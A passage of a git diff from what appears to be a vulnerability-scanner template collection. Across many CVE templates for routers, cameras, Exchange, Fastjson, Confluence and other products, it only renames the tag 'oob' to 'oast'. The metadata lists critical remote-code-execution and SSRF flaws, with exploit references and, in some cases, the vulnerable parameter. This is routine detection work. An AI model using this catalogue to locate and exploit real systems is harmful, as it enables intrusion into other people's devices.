MR5, v9.607 MR7, and v9.511 MR11 reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - tags: cve,cve2020,sophos,rce,oob + tags: cve,cve2020,sophos,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 2ee12a9f60..d70e43e555 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -8,7 +8,7 @@ info: reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,dlink,rce,oob + tags: cve,cve2020,dlink,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index 18174b37ea..a57eaa9237 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -8,7 +8,7 @@ info: reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,netgear,rce,oob + tags: cve,cve2020,netgear,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 45c1ee460a..e0b08965cd 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -9,7 +9,7 @@ info: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - tags: cve,cve2020,terramaster,rce,oob + tags: cve,cve2020,terramaster,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index d8708d874c..8520809f13 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 - tags: cve,cve2020,monitorr,rce,oob + tags: cve,cve2020,monitorr,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index a271437130..4e6105c4ea 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index fd466fe1a3..36714819c0 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oob,router + tags: cve,cve2020,linksys,rce,oast,router classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index 7ff8dd8f94..bb51b3b39a 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC - tags: cve,cve2020,sap,ssrf,oob + tags: cve,cve2020,sap,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f570b6ab86..28d754aeab 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + tags: cve,cve2020,smtp,opensmtpd,network,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 3c7e70486f..bf0dae4846 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -7,7 +7,7 @@ info: description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. reference: - https://www.adminxe.com/2183.html - tags: cve,cve2020,zimbra,ssrf,oob + tags: cve,cve2020,zimbra,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 988906da9e..d8ab5f4114 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -7,7 +7,7 @@ info: description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - tags: cve,cve2020,cacti,rce,oob + tags: cve,cve2020,cacti,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 229fe664bb..d7e5339d49 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -13,7 +13,7 @@ info: - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md - tags: cve,cve2021,cisco,rce,oob + tags: cve,cve2021,cisco,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-1498.yaml b/cves/2021/CVE-2021-1498.yaml index f10fa4fa4c..52551ed30c 100644 --- a/cves/2021/CVE-2021-1498.yaml +++ b/cves/2021/CVE-2021-1498.yaml @@ -13,7 +13,7 @@ info: - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md - tags: cve,cve2021,cisco,rce,oob + tags: cve,cve2021,cisco,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 0758519bac..0a31bb7afe 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -9,7 +9,7 @@ info: - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - tags: cve,cve2021,minio,ssrf,oob + tags: cve,cve2021,minio,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.70 diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index f1fcc89ba3..7560be89b8 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html - tags: cve,cve2021,gitlab,ssrf,oob + tags: cve,cve2021,gitlab,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.60 diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index 634ca3ad27..de4805ad65 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -6,7 +6,7 @@ info: description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a - tags: cve,cve2021,wordpress,lfi,ssrf,oob + tags: cve,cve2021,wordpress,lfi,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f2b5e87856..657ae33b97 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft + tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft reference: - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 66ef428473..016d7dfa7b 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: cve,cve2021,tenda,rce,oob + tags: cve,cve2021,tenda,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index c85b8eac3a..abf78bb0bb 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - tags: cve,cve2021,websvn,rce,oob + tags: cve,cve2021,websvn,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 455e65993d..46ba6e1c2d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -12,7 +12,7 @@ info: - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/ - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 - tags: cve,cve2021,nodejs,rce,oob + tags: cve,cve2021,nodejs,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 6a55383739..962a422282 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - https://github.com/RaspAP/raspap-webgui description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. - tags: cve,cve2021,rce,raspap,oob + tags: cve,cve2021,rce,raspap,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 6337242a45..07f4a2f151 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -7,7 +7,7 @@ info: severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - tags: cve,cve2021,geutebruck,rce,oob + tags: cve,cve2021,geutebruck,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.20 diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml index df563b47c3..17f750ee26 100644 --- a/cves/2021/CVE-2021-3577.yaml +++ b/cves/2021/CVE-2021-3577.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-3577 cwe-id: CWE-78 - tags: cve,cve2021,rce,oob,motorola,iot + tags: cve,cve2021,rce,oast,motorola,iot requests: - raw: diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index afdeff9e10..25a1785fc2 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -7,7 +7,7 @@ info: severity: critical reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ - tags: cve,cve2021,sureline,rce,oob + tags: cve,cve2021,sureline,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index 8c7d545c22..51d98bbad2 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml @@ -9,7 +9,7 @@ info: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - tags: cve,cve2021,ssrf,apache,mod-proxy,oob + tags: cve,cve2021,ssrf,apache,mod-proxy,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.00 diff --git a/iot/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml index 774cf2a690..994b19128d 100644 --- a/iot/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: high description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php - tags: targa,ssrf,oob,iot + tags: targa,ssrf,oast,iot requests: - raw: diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml index 8ab2ad1a4c..2674cd7f60 100644 --- a/misconfiguration/cloudflare-image-ssrf.yaml +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: info description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 - tags: cloudflare,misconfig,oob + tags: cloudflare,misconfig,oast requests: - raw: diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml index 2eff47e123..5daa74204e 100644 --- a/misconfiguration/linkerd-ssrf-detect.yaml +++ b/misconfiguration/linkerd-ssrf-detect.yaml @@ -4,7 +4,7 @@ info: name: Linkerd SSRF detection author: dudez severity: high - tags: ssrf,linkerd,oob + tags: ssrf,linkerd,oast reference: https://twitter.com/nirvana_msu/status/1084144955034165248 requests: diff --git a/misconfiguration/ssrf-via-oauth-misconfig.yaml b/misconfiguration/ssrf-via-oauth-misconfig.yaml index c4c61ac7c2..d9b4e75556 100644 --- a/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -5,7 +5,7 @@ info: author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - tags: misconfig,oob,oauth + tags: misconfig,oast,oauth reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: diff --git a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml index 780055a6d9..ea4569fc8a 100644 --- a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml +++ b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml @@ -8,7 +8,7 @@ info: reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - tags: confluence,atlassian,ssrf,jira,oob + tags: confluence,atlassian,ssrf,jira,oast requests: - method: GET diff --git a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml index 864e73e8dd..b914c4b0e3 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml @@ -8,7 +8,7 @@ info: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce - https://www.freebuf.com/vuls/208339.html - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml index d0e75c825e..84843c7c35 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml index 9fb159c5ff..a6146589d3 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml index ea9499ce58..98c915edeb 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml index e8428e5e15..1c8990b146 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml @@ -9,7 +9,7 @@ info: - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml index 8afbf260fd..236712a7b8 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml index 28f6c5d5cd..326f2fb9ff 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml index 49ef2c1de0..64d91e3be9 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml index b4404a4f0c..332914d8d0 100644 --- a/vulnerabilities/generic/oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed URL from the request headers. reference: https://github.com/PortSwigger/collaborator-everywhere - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - method: GET diff --git a/vulnerabilities/generic/oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml index 3c3dbce5db..69955c6ee2 100644 --- a/vulnerabilities/generic/oob-param-based-interaction.yaml +++ b/vulnerabilities/generic/oob-param-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed URL from the request parameters. reference: https://github.com/PortSwigger/collaborator-everywhere - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - method: GET diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index e532b15dde..dfa1de5d96 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed DNS Name from the request. reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - raw: diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index fc90bf1e5d..47a2da9817 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob,intrusive + tags: hashicorp,rce,oast,intrusive requests: - raw: diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 88176d592c..f0aa5c374c 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -7,7 +7,7 @@ info: description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. reference: - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: mirai,rce,oob + tags: mirai,rce,oast requests: - raw: diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index 9b4442dcd8..3fb5459ca4 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -7,7 +7,7 @@ info: description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - tags: netgear,rce,oob,router + tags: netgear,rce,oast,router requests: - raw: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index f79ef39c18..7b87b1527b 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: optiLink,rce,oob + tags: optiLink,rce,oast requests: - raw: diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 902279b7f8..24a127592a 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -6,7 +6,7 @@ info: severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: https://www.exploit-db.com/exploits/49344 - tags: sar2html,rce,oob + tags: sar2html,rce,oast requests: - raw: diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml index b2c31e9384..8b0edcd260 100644 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -7,7 +7,7 @@ info: description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://www.exploit-db.com/exploits/50098 - tags: visualtools,rce,oob + tags: visualtools,rce,oast requests: - raw: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index f8e73a2cf6..d1deffe075 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: - https://www.adminxe.com/2183.html - tags: zimbra,ssrf,oob + tags: zimbra,ssrf,oast requests: - raw: diff --git 